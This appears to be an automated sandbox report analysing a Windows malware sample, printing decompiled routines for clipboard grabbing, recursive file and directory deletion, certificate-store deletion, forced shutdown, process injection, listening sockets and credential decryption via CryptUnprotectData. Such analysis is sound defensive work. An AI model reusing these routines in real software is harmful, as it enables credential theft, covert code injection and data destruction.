GetClipboardData.USER32 ref: 00410485

Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,0040B77D,000002F4,00000000,000002F4,909011A5,00000002), ref: 0041CB61

GlobalLock.KERNEL32 ref: 004104B9
EnterCriticalSection.KERNEL32(00422B14,00000000,00000000), ref: 004104F9
LeaveCriticalSection.KERNEL32(00422B14,00000000,00403398), ref: 00410510
GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 00410523

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockObjectSingleUnlockWait
String ID:
API String ID: 1109978993-0
Opcode ID: ebfa1400838b891feb8560f82bc0cf4e1244d28a4c5dfe9a8f73015e3ecee2ce
Instruction ID: 9316c05431471cb8acb72dba24519c8c4a49c2460646c834cff9cf75c252eaa2
Opcode Fuzzy Hash: ebfa1400838b891feb8560f82bc0cf4e1244d28a4c5dfe9a8f73015e3ecee2ce
Instruction Fuzzy Hash: AD11EB36600115F786215B699DC49FF375A9F86364B150027FB05A7310DBFC8DC246ED

Uniqueness

Uniqueness Score: -1.00%

Function 0041737C, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041737C(WCHAR* __ecx, void* __eflags) {
				struct _WIN32_FIND_DATAW _v596;
				short _v1116;
				WCHAR* _t38;
				void* _t42;

				_t38 = __ecx;
				if(E00417593("*",  &_v1116, __ecx) == 0) {
					L9:
					SetFileAttributesW(_t38, 0x80);
					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
				}
				_t42 = FindFirstFileW( &_v1116,  &_v596);
				if(_t42 == 0xffffffff) {
					goto L9;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E00417193( &(_v596.cFileName)) == 0 && E00417593( &(_v596.cFileName),  &_v1116, _t38) != 0) {
						_t51 = _v596.dwFileAttributes & 0x00000010;
						if((_v596.dwFileAttributes & 0x00000010) == 0) {
							E00417064( &_v1116);
						} else {
							E0041737C( &_v1116, _t51);
						}
					}
				} while (FindNextFileW(_t42,  &_v596) != 0);
				FindClose(_t42);
				goto L9;
			}

0x0041738a
0x0041739e
0x00417419
0x0041741f
0x00417436
0x00417436
0x004173b3
0x004173b8
0x00000000
0x00000000
0x00000000
0x00000000
0x004173ba
0x004173ba
0x004173c8
0x004173e0
0x004173e8
0x004173fa
0x004173ea
0x004173ee
0x004173ee
0x004173e8
0x0041740e
0x00417413
0x00000000

APIs

Part of subcall function 00417593: PathCombineW.SHLWAPI(0041C47F,0041C47F,?,0041C47F,?,?), ref: 004175B2

FindFirstFileW.KERNEL32(?,?,?,?), ref: 004173AD
FindNextFileW.KERNEL32(00000000,?), ref: 00417408
FindClose.KERNEL32(00000000), ref: 00417413
SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 0041741F
RemoveDirectoryW.KERNEL32(?), ref: 00417426

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
String ID:
API String ID: 765042924-0
Opcode ID: 30dfe49036167bfe71b97cc88243e62c06521ce2a33e9c24c2a3a0a51725a8bd
Instruction ID: 3e5d87d186edd761a55151997939db3d88ab0930beb10ec9bc58babd760515b7
Opcode Fuzzy Hash: 30dfe49036167bfe71b97cc88243e62c06521ce2a33e9c24c2a3a0a51725a8bd
Instruction Fuzzy Hash: 8C1186710082086AC620EB64DD49ADB77BC9F49354F04453BFDA5D3191EB389589C65A

Uniqueness

Uniqueness Score: -1.00%

Function 00405554, Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00401638), ref: 0040555F
CertDuplicateCertificateContext.CRYPT32(00000000), ref: 00405578
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,0041D150), ref: 00405583
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040558B
CertCloseStore.CRYPT32(00000000,00000000), ref: 00405597

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
String ID:
API String ID: 1842529175-0
Opcode ID: d698f9ca710386ec24f8c07afe637ed4556750a7e5d7d9c82cfd7bb33a3a7934
Instruction ID: 45d8b86215d559ca91a97c31493e1a1e26ad7f14d1c1cdc1bc4eb9ef6be05b64
Opcode Fuzzy Hash: d698f9ca710386ec24f8c07afe637ed4556750a7e5d7d9c82cfd7bb33a3a7934
Instruction Fuzzy Hash: 56F0A0322826107BD62117356E08FFBBB6CDB52B61B040133FA85F32A48E398841897C

Uniqueness

Uniqueness Score: -1.00%

Function 00418801, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00418801(void* __ebx, void* __ecx) {
				signed int _v124;
				signed char _t12;

				_t12 =  *0x423a30;
				if((_t12 & 0x00000010) == 0) {
					__eflags = _t12 & 0x00000008;
					if(__eflags != 0) {
						E004115E4(__ebx, __ecx, __eflags);
						_t12 =  *0x423a30;
					}
					__eflags = _t12 & 0x00000003;
					if((_t12 & 0x00000003) == 0) {
						__eflags = _t12 & 0x00000004;
						if((_t12 & 0x00000004) != 0) {
							goto L8;
						}
						goto L9;
					} else {
						E004133CA(L"SeShutdownPrivilege");
						__eflags = 0;
						__imp__InitiateSystemShutdownExW(0, 0, 0, 1,  *0x423a30 >> 0x00000001 & 0x00000001, 0x80000000);
						return 0;
					}
				} else {
					_t12 = E0040B2E7( &_v124);
					if(_t12 != 0) {
						_v124 = _v124 | 0x00000020;
						 *0x423b60 =  *0x423b60 | 0x00000010;
						E0040B33F( &_v124);
						L8:
						return ExitWindowsEx(0x14, 0x80000000);
					}
					L9:
					return _t12;
				}
			}

0x00418804
0x0041880e
0x00418833
0x00418835
0x00418837
0x0041883c
0x0041883c
0x00418841
0x00418843
0x0041886e
0x00418870
0x00000000
0x00000000
0x00000000
0x00418845
0x0041884a
0x00418861
0x00418866
0x0041886d
0x0041886d
0x00418810
0x00418814
0x0041881b
0x0041881d
0x00418821
0x0041882c
0x00418872
0x00000000
0x00418879
0x00418880
0x00418880
0x00418880

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 00418866

Part of subcall function 0040B2E7: CreateMutexW.KERNEL32(00423B98,00000000,00422848,?,?,0040524D,?,?,?,743C152E,00000002), ref: 0040B30D

ExitWindowsEx.USER32(00000014,80000000), ref: 00418879

Strings

, xrefs: 0041881D
SeShutdownPrivilege, xrefs: 00418845

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateExitInitiateMutexShutdownSystemWindows
String ID: $SeShutdownPrivilege
API String ID: 3829579691-2253681161
Opcode ID: 56b4027c38f657f17d2812033e605c80f5d9dc10696594b65ccd137a3e46f85c
Instruction ID: 7761114d76ae48d161dea7f7beec0a2c414beac69ad4441a4d651e77918615eb
Opcode Fuzzy Hash: 56b4027c38f657f17d2812033e605c80f5d9dc10696594b65ccd137a3e46f85c
Instruction Fuzzy Hash: 7CF0DB31A1024459EA10ABB55D46BEA3B78A700749F94003EE982F21A2CB7CD542CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 00416662, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416662(void* __eax, void* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				void* _t37;
				void* _t42;
				intOrPtr* _t43;
				int _t44;
				long _t46;
				void* _t47;
				SIZE_T* _t48;
				signed int _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				unsigned int _t64;

				_t55 = __eax;
				_t60 =  *((intOrPtr*)(__eax + 0x3c)) + __eax;
				_t46 =  *(_t60 + 0x50);
				_v24 = _t46;
				_v5 = 0;
				if(IsBadReadPtr(__eax, _t46) == 0) {
					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
					_v12 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						L17:
						return _v12;
					}
					_t47 = E00411D51(__eflags, _t55, _t46);
					_t48 = 0;
					__eflags = _t47;
					if(_t47 == 0) {
						L16:
						VirtualFreeEx(_a4, _v12, 0, 0x8000);
						_t32 =  &_v12;
						 *_t32 = _v12 & 0x00000000;
						__eflags =  *_t32;
						goto L17;
					}
					__eflags =  *(_t60 + 0xa4);
					if( *(_t60 + 0xa4) <= 0) {
						L15:
						E00411CFE(_t47);
						__eflags = _v5;
						if(_v5 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t42 =  *(_t60 + 0xa0);
					__eflags = _t42;
					if(_t42 <= 0) {
						goto L15;
					}
					_t61 =  *((intOrPtr*)(_t60 + 0x34));
					_t54 = _v12 - _t61;
					_v20 = _t55 - _t61;
					_t43 = _t42 + _t47;
					while(1) {
						__eflags =  *_t43 - _t48;
						if( *_t43 == _t48) {
							break;
						}
						_t62 =  *((intOrPtr*)(_t43 + 4));
						__eflags = _t62 - 8;
						if(_t62 < 8) {
							L12:
							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
							_t48 = 0;
							__eflags = 0;
							continue;
						}
						_t64 = _t62 + 0xfffffff8 >> 1;
						__eflags = _t64;
						_v16 = _t48;
						if(_t64 == 0) {
							goto L12;
						} else {
							goto L9;
						}
						do {
							L9:
							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
							__eflags = _t50;
							if(_t50 != 0) {
								_t52 = (_t50 & 0x00000fff) +  *_t43;
								_t19 = _t52 + _t47;
								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
								__eflags =  *_t19;
							}
							_v16 = _v16 + 1;
							__eflags = _v16 - _t64;
						} while (_v16 < _t64);
						goto L12;
					}
					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
					__eflags = _t44;
					_t28 =  &_v5;
					 *_t28 = _t44 != 0;
					__eflags =  *_t28;
					goto L15;
				}
				return 0;
			}

0x0041666b
0x00416670
0x00416672
0x00416677
0x0041667a
0x00416686
0x0041669c
0x004166a2
0x004166a5
0x004166a7
0x0041675d
0x00000000
0x0041675d
0x004166b4
0x004166b6
0x004166b8
0x004166ba
0x00416746
0x00416753
0x00416759
0x00416759
0x00416759
0x00000000
0x00416759
0x004166c0
0x004166c6
0x0041673a
0x0041673b
0x00416740
0x00416744
0x00000000
0x00000000
0x00000000
0x00416744
0x004166c8
0x004166ce
0x004166d0
0x00000000
0x00000000
0x004166d2
0x004166da
0x004166dc
0x004166df
0x0041671f
0x0041671f
0x00416721
0x00000000
0x00000000
0x004166e3
0x004166e6
0x004166e9
0x0041671a
0x0041671a
0x0041671d
0x0041671d
0x00000000
0x0041671d
0x004166ee
0x004166ee
0x004166f0
0x004166f3
0x00000000
0x00000000
0x00000000
0x00000000
0x004166f5
0x004166f5
0x004166f8
0x004166fd
0x00416700
0x00416708
0x0041670f
0x0041670f
0x0041670f
0x0041670f
0x00416712
0x00416715
0x00416715
0x00000000
0x004166f5
0x0041672e
0x00416734
0x00416736
0x00416736
0x00416736
0x00000000
0x00416736
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,73BCF560,00000000), ref: 0041667E
VirtualAllocEx.KERNEL32(73BCF560,00000000,?,00003000,00000040,?,73BCF560,00000000), ref: 0041669C
WriteProcessMemory.KERNEL32(73BCF560,73BCF560,00000000,?,00000000,?,?,?,73BCF560,00000000), ref: 0041672E
VirtualFreeEx.KERNEL32(73BCF560,73BCF560,00000000,00008000,?,?,?,73BCF560,00000000), ref: 00416753

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Virtual$AllocFreeMemoryProcessReadWrite
String ID:
API String ID: 1273498236-0
Opcode ID: 2cdee3e925f538f2e825fe1f836a20dfb11487f350e492fa66c74712feab3025
Instruction ID: 947996b37b97a478577bde6272c5bebec2ec23415ca3f1b0a449d75cbd2fb5db
Opcode Fuzzy Hash: 2cdee3e925f538f2e825fe1f836a20dfb11487f350e492fa66c74712feab3025
Instruction Fuzzy Hash: 5731B272E00219AFCF119F64CD84BAEBBB5EF05749F06806AE911B72A0C774DD81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00414E40, Relevance: 6.0, APIs: 4, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 00414E49
bind.WS2_32(00000000,?,-0000001D), ref: 00414E69
listen.WS2_32(00000000,?), ref: 00414E78
closesocket.WS2_32(00000000), ref: 00414E83

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: bindclosesocketlistensocket
String ID:
API String ID: 952684215-0
Opcode ID: 7bf398db5b36a079c17405aa6493f4fc5826d317daff90d150d2c74fdfc1f8e0
Instruction ID: 11b3e49bed4bc1792e8eb1af202bf7c0fdb2d36201ad90ced13dba67e7b385fe
Opcode Fuzzy Hash: 7bf398db5b36a079c17405aa6493f4fc5826d317daff90d150d2c74fdfc1f8e0
Instruction Fuzzy Hash: 92F0A03220020276D6202F399C09A6F29A9ABC27B0B044729F562D71F0E73888D2C524

Uniqueness

Uniqueness Score: -1.00%

Function 0041511E, Relevance: 4.5, APIs: 3, Instructions: 27networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 00415127
bind.WS2_32(00000000,00000017,-0000001D), ref: 00415147
closesocket.WS2_32(00000000), ref: 00415152

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: bindclosesocketsocket
String ID:
API String ID: 1873677229-0
Opcode ID: d7c9bb762e09e6f33cd7c81b7000c6d35edcca1af1ec6799c644f1cdb5d6a7ea
Instruction ID: 404ff9780e0aad60a195eaa42af39461bf6160bd22d5545199e984db2d45807f
Opcode Fuzzy Hash: d7c9bb762e09e6f33cd7c81b7000c6d35edcca1af1ec6799c644f1cdb5d6a7ea
Instruction Fuzzy Hash: E6E04832600511B6D2201B3DAD4EBAF25A9ABC67B17144715B572D71E1E77888C29524

Uniqueness

Uniqueness Score: -1.00%

Function 00408558, Relevance: 3.2, APIs: 2, Instructions: 162
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408558(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				signed int _v48;
				void* _v52;
				char _v56;
				char _v72;
				void* _v96;
				char _v196;
				void* __ebx;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				signed int _t65;
				void* _t66;
				void* _t68;
				char* _t70;
				intOrPtr _t77;
				signed int* _t82;
				intOrPtr _t95;
				void* _t97;
				signed int _t100;
				void* _t107;
				void* _t109;
				intOrPtr _t115;
				char* _t117;
				void* _t129;

				_t121 = __eflags;
				_t115 = _a4;
				_push(_t115);
				_t92 = __eax;
				_t48 = E00408505(__eax, __eflags, 0x4c);
				_push(_t115);
				_v20 = _t48;
				_t50 = E00408505(_t92, _t121, 0x4f);
				_push(_t115);
				_v24 = _t50;
				_t52 = E00408505(_t92, _t121, 0x50);
				_push(_t115);
				_v28 = _t52;
				_t54 = E00408505(_t92, _t121, 0x4d);
				_push(_t115);
				_v36 = _t54;
				_v12 = E00408505(_t92, _t121, 0x4e);
				_v5 = _v20 != 0;
				if(_v5 != 0) {
					_t95 = _v12;
					_t65 = E0041284D(_t95);
					if(_t95 != 0 && _t65 > 1) {
						_t100 = _t65 & 0x80000001;
						if(_t100 < 0) {
							_t129 = (_t100 - 0x00000001 | 0xfffffffe) + 1;
						}
						if(_t129 == 0) {
							asm("cdq");
							_v48 = _t65 - _t107 >> 1;
							_t77 = E00411CCE(_t65 - _t107 >> 1);
							_v44 = _t77;
							if(_t77 != 0) {
								if(E0041253B(_v12, _t77) != 0) {
									_t82 =  &_v48;
									__imp__CryptUnprotectData(_t82, 0, _a8, 0, 0, 0,  &_v56);
									if(_t82 == 1) {
										_v16 = E004120BA(_v52);
										LocalFree(_v52);
									}
								}
								E00411CFE(_v44);
							}
						}
					}
					_t66 = 0x4b;
					E00419897(_t66,  &_v196);
					_t117 =  &_v72;
					_t68 = 0x54;
					E00419897(_t68, _t117);
					_t70 = 0x403180;
					_t109 =  ==  ? 0x403180 : _v16;
					_t97 =  ==  ? 0x403180 : _v36;
					_t135 = _v32;
					if(_v32 != 0) {
						_t70 = _t117;
					}
					_push(_t109);
					_push(_t97);
					_push(_t70);
					_push(_v20);
					E00412A7F(_a12, E0041284D( *_a12),  *_a12, _t135,  &_v196, _a4);
					_t56 = E00411CFE(_v16);
				}
				E0041829C(E0041829C(E0041829C(E0041829C(E0041829C(_t56, _v20), _v24), _v28), _v36), _v12);
				return _v5;
			}

0x00408558
0x00408563
0x00408566
0x00408569
0x0040856c
0x00408571
0x00408574
0x00408578
0x0040857d
0x00408580
0x00408584
0x00408589
0x0040858c
0x00408590
0x00408595
0x00408598
0x004085a6
0x004085a9
0x004085b0
0x004085fc
0x004085ff
0x00408606
0x0040860f
0x00408615
0x0040861b
0x0040861b
0x0040861c
0x0040861e
0x00408623
0x00408626
0x0040862b
0x00408630
0x0040863e
0x0040864a
0x0040864f
0x00408658
0x00408668
0x0040866b
0x0040866b
0x00408658
0x00408674
0x00408674
0x00408630
0x0040861c
0x00408681
0x00408682
0x00408689
0x0040868c
0x0040868d
0x0040869a
0x0040869f
0x004086a4
0x004086a7
0x004086aa
0x004086ac
0x004086ac
0x004086ae
0x004086b2
0x004086b5
0x004086b7
0x004086cd
0x004086d8
0x004086dd
0x00408701
0x0040870c

APIs

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 0040864F
LocalFree.KERNEL32(?,?,?,?), ref: 0040866B

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Free$CryptDataHeapLocalUnprotect
String ID:
API String ID: 2231100991-0
Opcode ID: 83546d0f374413283a24d1b1a0e719b1824d0ab4ce93fb5f228e4be05f1dd9c8
Instruction ID: bad3ed207913765fbdd3518d60a1121896a50990c5b78a35351ef4833824f4c5
Opcode Fuzzy Hash: 83546d0f374413283a24d1b1a0e719b1824d0ab4ce93fb5f228e4be05f1dd9c8
Instruction Fuzzy Hash: 1A518C71E00219AACF10AFE58D55AEEBBB5AF44314F10483EF204F7291DA395D818F98

Uniqueness

Uniqueness Score: -1.00%

Function 00414C41, Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 00414C8E
recv.WS2_32(?,?,00000000,00000000), ref: 00414CA6

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: recvselect
String ID:
API String ID: 741273618-0
Opcode ID: d27074ca6ff0152fc814da5042489ef2e2975e8bf85304e79dd373f91d493134
Instruction ID: cbc4cd370e52f3b779bd05d4a546fe94bfa2f7a2968d32836dc9d12444f789ae
Opcode Fuzzy Hash: d27074ca6ff0152fc814da5042489ef2e2975e8bf85304e79dd373f91d493134
Instruction Fuzzy Hash: 38F0A4728011246BC7189F65CC449DE7E6DEF86320F108366B41AE51D1E6748A848FD4

Uniqueness

Uniqueness Score: -1.00%

Function 00408C77, Relevance: 1.7, APIs: 1, Instructions: 179
comCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00408C77() {
				signed int _v5;
				void* _v12;
				signed short* _v16;
				char _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				char _v40;
				char _v56;
				void* _v260;
				char _v356;
				char _v460;
				void* __edi;
				void* __esi;
				char* _t52;
				void* _t53;
				void* _t55;
				void* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr* _t79;
				intOrPtr* _t84;
				intOrPtr* _t86;
				void* _t87;
				signed short* _t88;
				intOrPtr _t96;
				signed int _t113;
				intOrPtr* _t117;
				char* _t119;
				char* _t121;

				_t52 =  &_v32;
				_v32 = 0;
				__imp__CoCreateInstance(0x4015e0, 0, 0x4401, 0x4015c0, _t52);
				if(_t52 != 0) {
					L3:
					_v16 = 0;
					_t117 = 0;
					L4:
					if(_t117 == 0) {
						return _t52;
					}
					_t53 = 0x39;
					E00419897(_t53,  &_v56);
					_t121 =  &_v40;
					_t55 = 0x3a;
					E00419897(_t55, _t121);
					_push(_t121);
					_push( &_v56);
					_push(_t117);
					_v20 = 0;
					if( *((intOrPtr*)( *_t117 + 0xc))() != 0) {
						L31:
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_push(0xcc);
						return E00407DEB(_t114, _v20, 0x38);
					}
					_push( &_v12);
					_push(_t117);
					if( *((intOrPtr*)( *_t117 + 0x20))() != 0) {
						goto L31;
					}
					_t65 = 0x3b;
					E00419897(_t65,  &_v356);
					_t67 = _v12;
					 *((intOrPtr*)( *_t67 + 0xc))(_t67);
					_t69 = _v12;
					_push(_t69);
					if( *((intOrPtr*)( *_t69 + 0x10))() != 0) {
						L30:
						_t71 = _v12;
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						goto L31;
					}
					_t96 = 0x64;
					do {
						_t73 = _v12;
						_t114 =  &_v28;
						_push( &_v28);
						_push(_t73);
						if( *((intOrPtr*)( *_t73 + 0x14))() != 0) {
							goto L28;
						}
						_t77 = _v28;
						_t114 =  &_v24;
						_push( &_v24);
						_push(0x4015d0);
						_push(_t77);
						if( *((intOrPtr*)( *_t77))() != 0) {
							L27:
							_t79 = _v28;
							 *((intOrPtr*)( *_t79 + 8))(_t79);
							goto L28;
						}
						_v5 = 1;
						while(1) {
							_push(_v5 & 0x000000ff);
							_push( &_v356);
							_t114 = 0x34;
							_t119 =  &_v460;
							if(E004129F1( &_v356, _t114, _t119) <= 0) {
								break;
							}
							_t86 = _v24;
							_t114 = _t119;
							_v36 = _t96;
							_t87 =  *((intOrPtr*)( *_t86 + 0xc))(_t86, _t119, 0,  &_v260, _t96,  &_v36);
							if(_t87 != 0) {
								if(_t87 == 0x7a || _t87 == 1) {
									L25:
									_v5 = _v5 + 1;
									if(_v5 <= _t96) {
										continue;
									}
								}
								break;
							}
							_t88 =  &_v260;
							if(_v260 == 0) {
								L18:
								if( *_t88 != 0x40) {
									_t88 = 0;
								}
								L20:
								if(_t88 != 0 && E004120F2( &_v260 | 0xffffffff,  &_v20,  &_v260) != 0) {
									E004120F2(1,  &_v20, 0x40317c);
								}
								goto L25;
							}
							_t113 = _v260 & 0x0000ffff;
							while(_t113 != 0x40) {
								_t88 =  &(_t88[1]);
								_t113 =  *_t88 & 0x0000ffff;
								if(_t113 != 0) {
									continue;
								}
								goto L18;
							}
							goto L20;
						}
						_t84 = _v24;
						 *((intOrPtr*)( *_t84 + 8))(_t84);
						goto L27;
						L28:
						_t75 = _v12;
						_push(_t75);
					} while ( *((intOrPtr*)( *_t75 + 0x10))() == 0);
					_t117 = _v16;
					goto L30;
				}
				_t117 = _v32;
				if(_t117 == 0) {
					goto L3;
				} else {
					_v16 = _t117;
					goto L4;
				}
			}

0x00408c83
0x00408c99
0x00408c9c
0x00408ca4
0x00408cb2
0x00408cb2
0x00408cb5
0x00408cb7
0x00408cb9
0x00408e5c
0x00408e5c
0x00408cc4
0x00408cc5
0x00408ccc
0x00408ccf
0x00408cd0
0x00408cd9
0x00408cdd
0x00408cde
0x00408cdf
0x00408ce7
0x00408e42
0x00408e45
0x00408e4b
0x00000000
0x00408e53
0x00408cf2
0x00408cf3
0x00408cf9
0x00000000
0x00000000
0x00408d07
0x00408d08
0x00408d0d
0x00408d13
0x00408d16
0x00408d1b
0x00408d21
0x00408e39
0x00408e39
0x00408e3f
0x00000000
0x00408e3f
0x00408d29
0x00408d2a
0x00408d2a
0x00408d2f
0x00408d32
0x00408d33
0x00408d39
0x00000000
0x00000000
0x00408d3f
0x00408d44
0x00408d47
0x00408d48
0x00408d4d
0x00408d52
0x00408e1c
0x00408e1c
0x00408e22
0x00000000
0x00408e22
0x00408d58
0x00408d5c
0x00408d60
0x00408d67
0x00408d6a
0x00408d6b
0x00408d7a
0x00000000
0x00000000
0x00408d80
0x00408d91
0x00408d94
0x00408d9a
0x00408d9f
0x00408e00
0x00408e07
0x00408e07
0x00408e0d
0x00000000
0x00000000
0x00408e0d
0x00000000
0x00408e00
0x00408da9
0x00408daf
0x00408dc9
0x00408dcd
0x00408dcf
0x00408dcf
0x00408dd1
0x00408dd3
0x00408df6
0x00408df6
0x00000000
0x00408dd3
0x00408db1
0x00408db8
0x00408dbe
0x00408dc1
0x00408dc7
0x00000000
0x00000000
0x00000000
0x00408dc7
0x00000000
0x00408db8
0x00408e13
0x00408e19
0x00000000
0x00408e25
0x00408e25
0x00408e2a
0x00408e2e
0x00408e36
0x00000000
0x00408e36
0x00408ca6
0x00408cab
0x00000000
0x00408cad
0x00408cad
0x00000000
0x00408cad

APIs

CoCreateInstance.OLE32(004015E0,00000000,00004401,004015C0,?), ref: 00408C9C

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 29d2465acf80fea60788e5167306540df64ebd56ca6c62ea8fe366a01babc130
Instruction ID: e965818b1f77cad446c5b149f8a52511fa65f25c3f72eb3bbdfeb98461b9f9aa
Opcode Fuzzy Hash: 29d2465acf80fea60788e5167306540df64ebd56ca6c62ea8fe366a01babc130
Instruction Fuzzy Hash: E7515D71A00209ABDB10DBA1C984AEFB778FF98714F1444AEE545FB2C0DB79AD41CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00411E28, Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411E28() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t11;
				void* _t13;

				_t11 = _t13 - 0x78;
				_t7 = GetTimeZoneInformation(_t11 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t11 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t11 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}

0x00411e29
0x00411e37
0x00411e40
0x00411e4a
0x00411e57
0x00411e4c
0x00411e4c
0x00000000
0x00411e4c
0x00411e42
0x00411e42
0x00411e4f
0x00411e52
0x00411e52
0x00411e5d

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 00411E37

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 09fcd8e40e31890f13ce203173545b96c56f290b75b689b4eeefc61c2ff40cf3
Instruction ID: a911ec4c4bc2daa0f7d9e1305cfd292a5883651eb70945fa8e8fbed54e8683bf
Opcode Fuzzy Hash: 09fcd8e40e31890f13ce203173545b96c56f290b75b689b4eeefc61c2ff40cf3
Instruction Fuzzy Hash: 83E086319442088BDB20DBE4EE45EDD77E9AB11308F200412FA42F6560E228D995C607

Uniqueness

Uniqueness Score: -1.00%

Function 0041C2AE, Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
